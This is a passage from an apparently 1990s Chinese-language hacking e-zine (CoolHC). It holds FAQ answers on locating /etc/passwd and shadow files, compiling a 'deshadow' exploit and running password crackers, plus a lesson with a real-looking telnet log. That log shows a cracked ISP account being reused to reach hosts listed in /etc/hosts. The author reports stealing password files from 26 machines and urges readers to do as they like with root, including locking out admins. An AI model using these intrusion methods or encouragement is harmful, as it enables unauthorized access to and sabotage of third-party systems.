                 FOR p = 1 TO 26

                 PRINT #1, No$(I) + Eng$(J) + LastWord$(k) + a$(l) + b$(m) +

c$(n) + d$(o) + e$(p)

                 NEXT p

                 NEXT o

                 NEXT n

                 NEXT m

                 NEXT l

                 NEXT k

                 NEXT J

                 NEXT I

                 CLOSE : END

--------------- Cut Here, End of HiNetPas.BAS

[Q8]请问一下,passwd除了会放在/etc/之下,还有可能会放在哪儿?

[A8]有有可能是 /etc/ 目录中的 passwd.??? 或 shadow 或 shadow.??? 都有可能.    

[Q9]我有在你的HOMEPAGE DOWNLOAD CoolHC#1.txt

里面有些步骤不懂如:1.(首先要先连上某一台你已经有帐号的 Telnet 主机.....)? 是不是在刚上HINET时出现拨号视窗下选=3

进入TELNET?还是SELECT=1 进入PPP後用WS-FTP 找寻etc/pass 的档案?

2.(我有在你的HOMEPAGE DOWNLOAD A letme.. of program 有点像claymore,不够不会使用

Q.他不把所

   有的设定都用好後按"START BF"在 DELAY 未结束时,把游标移到要 CRACK 的

PASSWORD

   BOX?但是出现了很长的数字也没有 CRACK? 3.(我在一些国外的WAREZ 看过有关HACK

UNIX

   的文件里有写都包函一段 "C"语言,是不是能在 TELNET 下输入执行程式就会自动

CHECK

   PASSWORD?是不是你在 "COOLHC#1.TXT里有保留一段进入 SYSTEM 的程式?

4.(有时用WS-FTP

   下找PASSWORD时,不是隐藏就是没用的档案,是否有方法让隐藏档显示?

5.你有一个AUTOHACK

   是不是一种利用拨电话的方式进入主机?(有点像电影中的战争游戏)?

6.像SHADOW.C的档

   案要如何组译成执行档?

[A9]好多的问题喔, 我一个一个回答吧! 1.LetMeIn! 是用在 PPP 模式, 不是 Telnet

模式, 你

   先连上 PPP 模式後开启 NetTerm 然後开 LetMeIn! 在 LetMeIn! 中作好设定按下

Start键

   後再回到 NetTerm 等待自动输入. 2.Telnet 可在你的 Win95 中找到, 只要连上 PPP

模式

   就可以使用, 你也可以使用 NetTerm 之类的软体, 不一定要在连线时选 Telnet

模式.

   3. LetMeIn! 需要在启动後回到 Telnet 软体才会自动 Crack  4.AutoHack

是自动拨号寻

   找有连接数据机的电话号码, 对 InterNet 来说可能没有用出吧! 5.用这一期 CoolHC

所说

   的 KOS 中有 Shadow.c 可以试试. 6.用 cc 指令可以编译, 但要看你的 ISP

有没有提供.

[Q10]请问我抓到的一些字典档 .Z 格式, 为何无法用 uncompress 解开,

解开後都是一些乱码

[A10]如果你用 Windows 或是 Win95 的话, 试著安装 WinZip 应该就可以解开了 !!

[Q11]请问能够提供更多的crack document吗

(能有中文吗,英文的有点吃力说)或是介绍更多的

    Crack Tools.

[A11] CoolHC 就是中文的呀! 但是其它的当然只有英文的可以看罗,

现在有没有多少人投入在

    写这样的东西呀~~ 本期的新工具就有介绍 KOS,

如果下此有好工具也会一并提出来介绍,

    若有网友使用的心得也可以传给我放在 Home Page 上!

       

本次主题: 善用你所得到的任何资讯 (Exm: HOSTS 档)

连接位址: xxx.xxx.xxx.xxx (又马赛克啦)

特别说明: 因为该站台是一个 "很大" 的 网路提供者, 其服务地区遍及全亚,

所以必须要特别以马

                赛克来处理, 希望网友们不要介意 (咱们重的是内容嘛!! 又不是..

那个.. 那个).

**** 课程开始 ****

首先说明的是, 这个网路提供者的服务项目,

包含了拨接及传真还有帮其它业者架设网路等, 也就是

说如果我们能够善用他们的系统就可以免费传真罗 ?? 哇哩... 国际传真耶,

这间公司不就亏大了!!!!!

所以马赛克处理是必要的, 不过这次的课程不是说明这个 ISP 够大,

而是我们如何利用一组已经破

解的密码来入侵其它与其相连的主机, 这点是比较重要的!!

大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了,

我们今天就来谈谈, 知道的

人跳过去吧!! 如果使用 Windoz 95 的人, 也可以看看在你 95

的系统目录中也有一个这样子的档案, 他

是长得像这个样子的:  127.0.0.1        localhost FETAG , 表示 127.0.0.1 为

LocalHost 也就是 FETAG 的电

脑, 所以我们要找与该 Unix 有 "直接关系" 的主机可以由这个地方找到.

找到这些主机有甚麽用呀 ?? 继然你已经有了一个主机的密码,

当然其它的主机也可能会有相同的

User 在其它的主机上用同样的帐号, 而且依据经验来说,

他们在其它主机上的密码通常都跟你目前所

拥有的这一份是一样的, 也就是你可以用同样的一组密码游走於其它的主机!!

以下示范的这个例子就

是啦!!

www:/etc$ telnet Superman.com.tw

Trying 222.111.111.111...

Connected to Superman.com.tw.

Escape character is '^]'.

Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0)

(甚麽烂公司, 新版系统的 Bug 少多了, 还不更新~~~)

Superman login: amywang

Password:

(用你所知道的密码进入)

Linux 1.2.8. (POSIX).

You have new mail.

(不要偷看人家的信喔)

Superman:~$ cd /etc

Superman:/etc$ cat hosts

(直接深入今天的主题)

#  For loopbacking.

127.0.0.1        localhost

222.111.247.1     router

222.111.247.2     abcdf01.tpfoo.Superman.com.tw       abcdf01     f01

222.111.247.3     abcdf02.tpfoo.Superman.com.tw       abcdf02     f02

222.111.247.4     abcdf03.tpfoo.Superman.com.tw       abcdf03     f03

222.111.247.5     abcdf04.tpfoo.Superman.com.tw       abcdf04     f04

207.121.0.15      abcdhk1.planet.com.hk              abcdhk1     hk1

222.111.248.2     abcdf11.tcfoo.Superman.com.tw       abcdf11     f11

222.111.248.3     abcdf12.tcfoo.Superman.com.tw       abcdf12     f12

222.111.248.4     abcdf13.tcfoo.Superman.com.tw       abcdf13     f13

222.111.248.131   abcdf21.ksfoo.Superman.com.tw       abcdf21     f21

222.111.248.132   abcdf22.ksfoo.Superman.com.tw       abcdf22     f22

222.111.248.133   abcdf23.ksfoo.Superman.com.tw       abcdf23     f23

222.111.248.134   abcdf24.ksfoo.Superman.com.tw       abcdf24     f24

222.111.247.33    abcdf01-s1.Superman.com.tw          abcdf01-s1  f01-s1

222.111.247.33    abcdf02-s1.Superman.com.tw          abcdf02-s1  f02-s1

222.111.247.34    abcdts2-s2.Superman.com.tw          abcdts2-s1  ts2-s1

222.111.247.193   abcdf11-s1.Superman.com.tw          abcdf11-s1  f11-s1

222.111.247.193   abcdf12-s1.Superman.com.tw          abcdf12-s1  f12-s1

222.111.247.194   abcdts1-s1.Superman.com.tw          abcdts1-s1  ts1-s1

222.111.247.73    abcdf21-s1.Superman.com.tw          abcdf21-s1  f21-s1

222.111.247.197   abcdf22-s1.Superman.com.tw          abcdf22-s1  f22-s1

222.111.247.198   abcdts1-s2.Superman.com.tw          abcdts1-s2  ts1-s2

222.111.247.201   abcdus1-s1.Superman.com.tw          abcdus1-s1  us1-s1

222.111.247.77   abcdus2-s1.Superman.com.tw          abcdus2-s1  us2-s1

222.111.247.78   abcdts1-s3.Superman.com.tw          abcdts1-s3  ts1-s3

222.111.247.133   abcdts1-l0.Superman.com.tw          abcdts1-l0  ts1-l0

222.111.248.10    abcdts2-l0.Superman.com.tw          abcdts2-l0  ts2-l0

#206.222.170.2    abcdus1.Superman.com.tw             abcdus1     us1

#206.222.170.3    abcdus2.Superman.com.tw             abcdus2     us2

206.222.170.4    abcdus3.Superman.com.tw             abcdus3     us3

206.222.170.5    abcdus4.Superman.com.tw             abcdus4     us4

206.222.170.7    abcdus1+.Superman.com.tw            abcdus1+    us1+ us1

206.222.170.6    abcdus2+.Superman.com.tw            abcdus2+    us2+ us2

222.111.247.131   linux01.Superman.com.tw             linux01  x01

222.111.247.135   linux03.Superman.com.tw             linux03

222.111.247.151   linux04.Superman.com.tw             linux04  x04

222.111.247.132   linux02-l0.Superman.com.tw          linux02  x02

222.111.111.111   Superman.Superman.com.tw          Superman

222.111.27.153   pc3.Superman.com.tw               abcdpc3  pc3

222.111.27.152   pc2.Superman.com.tw               abcdpc2  pc2

222.111.27.147   brian.Superman.com.tw             brian    brian

222.111.27.148   linuxpc.Superman.com.tw             linuxpc  hsliao

220.65.11.1 knet01

203.127.230.243 fooServer.warpdrive.com.sg sgp02

# End of hosts

(我已经尽量在马赛克了!! 如果有没有马赛克完全的地方, 请该网路业者见谅)

(因为是 Telnet LogFile 直接收录的嘛~~ 唉.. 谁叫你的系统这麽脆弱~~)

Superman:/etc$ telnet 220.65.11.1

Trying 210.65.33.2...

Connected to 210.65.33.2.

Escape character is '^]'.

Linux 1.2.8 (snet01) (ttyp2)

knet01 login: amywang

Password:

Linux 1.2.8. (KNET01).

You have new mail.

(进来了! 就是这样啦!!!!!!)

用了这种方法对该主机所连接的各点作测试,

找到了一个可以使用所有主机的帐号及密码档案, 我

用这个帐号抓了 26 台主机的 /etc/passwd, 现在我的机器还在使用 CJack 对这 26

个密码档解码中, 如

果有更进一步的消息, 我们会在下一篇的时候一并讨论,

当然这个方法不仅适用於这间公司, 对其它

的主机也都适用, 这间公司的规模应算不小了, 台湾; 香港; 日本都有分公司的样子,

不过也都.... 呵~

以上就是 hosts 档的妙用了!! 可能在此篇发表之後大家都用 DNS 了, 而不再编辑 hosts

档了~~~ 不过

这个档案也可以锁起来呀~~ 限定只有 root 可以用嘛! 反正一些烂 ISP 不是都这样,

一有安全顾虑就

限定使用者的使用... 老套了啦!! 你还是会有其它的漏洞的...  Linux 1.2.8 哈哈~~~

多的是漏洞哩!!!!

就算你把 hosts 也锁起来, passwd 也 shadow..

还是有一大堆的地方是欢迎大家进入的~~~

嗯.. 没有挑衅的意思啦~~ 各位亲爱的网路提供者... 请将您的系统加锁,

以免有任何不测. 上次我们说

的那个 ISP (WWW Server 有漏洞的那个), 这次已经将 root 的密码改掉了,

但是还是留下许多 User 的

密码没有改, Password 档也没有作任何的保护, 对於这样的业者, 哪一家公司的 Home

Page 敢放在上面

呢 ?? 被人乱改一通不是破坏了公司的形像吗 ??

**** 又是字典档 ****

这次字典档的部份不再多谈了, 讲讲上一次的一点漏失,

由於上次写出来的程式太多地方没有先作

考虑, 所以用起来怪怪的 !! 再加上很多的功能没有加上的关系,

有很多网友反映出来的问题多在自

己操作上的错误, 呵~~ 怪写程式的人没有作好一些检查的动作嘛~~

所以 CoolFire 决定将上次那个鸟程式重新写过, 配合排序及检查重覆的功能来使用,

预计由今天晚

上开始动工写出字典档的产生器, 这样才对各位网友们有个交待, 喝呵...

不过网友们别抱著太大的

希望, 因为 James 的 LetMeIn! 2.0 也还在大家的期盼下久久未见,

每天加班的他也实在没甚麽时间,

CoolFire 能在甚麽时候写好, 也是未知数. 不过请各位 Mail

给我你对此字典档产生器的意见, 还有

你希望它能在甚麽作业系统下动作 ?? DOS ?? Windoz ??

**** 首页更新通知 ****

上一次的通知有点早, 因为只改了小部份, 日後将不对小部份的更动作任何的通知,

仅对大更动通知,

不过还是请各位有空的时候上来多看看, 以免你在努力的时候别人已经看过了所有的 Hole

List 也将

漏洞补上了! 努力是会有成果的!!

CoolFire 想在板上放个 Crack 心得留言板 ! 有没有人有意见的 ??? 留信给我~

**** CoolFire FAQ ****

[Q1]你在 Coolhc~4 中讲到 Shadow.c 可以用 unix 里的 cc 指令 但如何 Keyin 例如:

ms.hinet.net/harlem/>CC

      之後呢?

[A1]在 Unix 系统中下以下的指令: cc -o deshadow shadow.c 最後所产生出来的

deshadow 就是执行档名了

      Unix 是一个不错的系统, 尤其是想要学习 Crack Password

或入侵的中H都一定踯n经过这个门槛, 大

      家可以多看看一些有关 Unix 的书籍, 当然 c 语言也是其必须的罗~~~:)

[Q2]deshadow 是在 Unix 下执行,还是在Dos下执行, 用 C 语言可不可以转换?

可不可以把shadow

     的 passwd拿回来再转换?

[A2]呵~~ 既然 /etc/passwd 已经 shadow 了! 你拿回来的当然是没有用的密码档,

只能知道其 user 的名字

      而已, 所以如果要拿回来 Crack 当然是不可能的, 而 DeShadow 是针对 Unix

系统的漏洞所设计的,

      且只能在 Unix 上尝试 DeShadow.. 故请在 Unix 上 Compiler 再执行,

当然有些系统可能已经将漏洞

      补上了, 或因为网路安全的问题不提供使用者编译档案,

那就只好使用其它方法罗~~~:)

[Q3]我找到root的密码了! 用kOS的字典档XXXX的etc/passwd 用Star Cracker,

只花了1小时30分 就找到了!

      找到root的密码可以做甚麽呢? 你有没有用kOS crack XXXX的 passwd

花了多久time?

[A3]哇 !! 恭喜你罗!(注: XXXX 部份为 "马赛克" ) 找到 root 的密码後能作甚麽 ???

呵.. 随便你罗, 想要

     作甚麽就作甚麽, 当然可以更进一步的得到更多的东西,

你可以任意修改系统(小心触法), 也可以

     在心情不好的时候把系统 "关" 起来, 不让别人上线, 亦可以更改 root 的密码,

让他们的 root 没有办

     法维护系统, 反正系统是你的了! 问我能作甚麽 ?? 我也不能回答你..... :)

我当然也 Crack 过, 不过

     时间嘛... 没算, 因为我都是用好几台电脑在跑的 (利用下班时间),

所以操作环境跟你不同罗!!

[Q4]看hopenet知道linux的bin/login中有一个很大漏洞可以取得root

的权限是怎麽一回事呢?

[A4]该文章附有一 URL 位址, 请连上去看看後就知道了, 现在也有许多人讨论这些东西,

不过很多公司

     用的 Linux 都还是 1.x.x 版的, 很好 Crack... 试试吧! 保证你会爱上它~~ 呵~

[Q5]Cyberspace是什麽样的组织?

[A5]嗯 ?? 连这种问题都有人问呀~~~ 请到 www.cyberspace.org 看看就知道罗~~~

[Q6] I have a question for the 'GZ' file format.

[A6]对呀!! 放了字典档的连结在首页上就出现了很多问 .z  .gz 档要怎麽解的问题了,

我的系统

     安装了 Winzip, Pkunzip, Gzip 後 .z  .gz 就变成 Winzip 可解的档案了,

知道该怎麽办了吧~~

[Q7]我日前从你的站台连至GlobalKOS下传jack14的辅助工具,

不过我的连线速度太慢,所以一直

      抓不回来,你可以 mirror 回来吗?

[A7]这种问题我也只好 Say "SORRY" 罗, 我们的首页上已经放了很多东西了,

而且也都是开放让

     同好们 "免费" 参观及抓取 (绝不收费啦!!), 且一个 kOS 就要 1.xxMB 那麽大,

我基於要放更

     多东西的关系提供了一个 Hot Link 在上面, 请各位 "努力" 吧!!

不然换条线试试, 你用的可能

     是学术网路吧!! 可不可以在非巅锋时间抓呢?? 还是弄个 ftp Server 帮你抓,

信箱够大的话可

     以用 Mail FTP... 等, 都可以达到你的目地的~~~:)

[Q8]我去找到了一个站的密码档,之後我执行JACK却出现 Virtual mode not supported

without VCPI

     的讯息,请问是什麽错误?

[A8]这位网友可能是使用 Windoz 95 的 DOS BOX 所出现的讯息吧!! VCPI 要在

EMM386.EXE 挂

      上後有效, 也就是说最好在纯 DOS 下挂上 EMM386.EXE 再使用 Crack Jack,

另外使用的时候

      也不要在 EMM386.EXE 後下 NOEMS 的参数, 不然 CJack 也不会理你, 至於怎麽在

Win95 的

      DOS BOX 中使用 CJack ?? 我也不知道! 有没有人试成功的, 请出个声吧!!

[Q9]我如果由www得到密码档,破解之後我要从那输入密码?

[A9]嗯, 很简单呀!! 启动你的 Telnet 软体 (NetTerm... Telnet... etc.) 连线到

www.xxx.xxx.xxx 去, 然

     後就可以输入密码, 依正常程序 Login 就成了!! 加油喔~~ Enjoy Hacking~:)

[Q10]我无法将字典档抓下来, 可否用E-MAIL寄给我

[A10]........ 谁来帮我回答~~~~?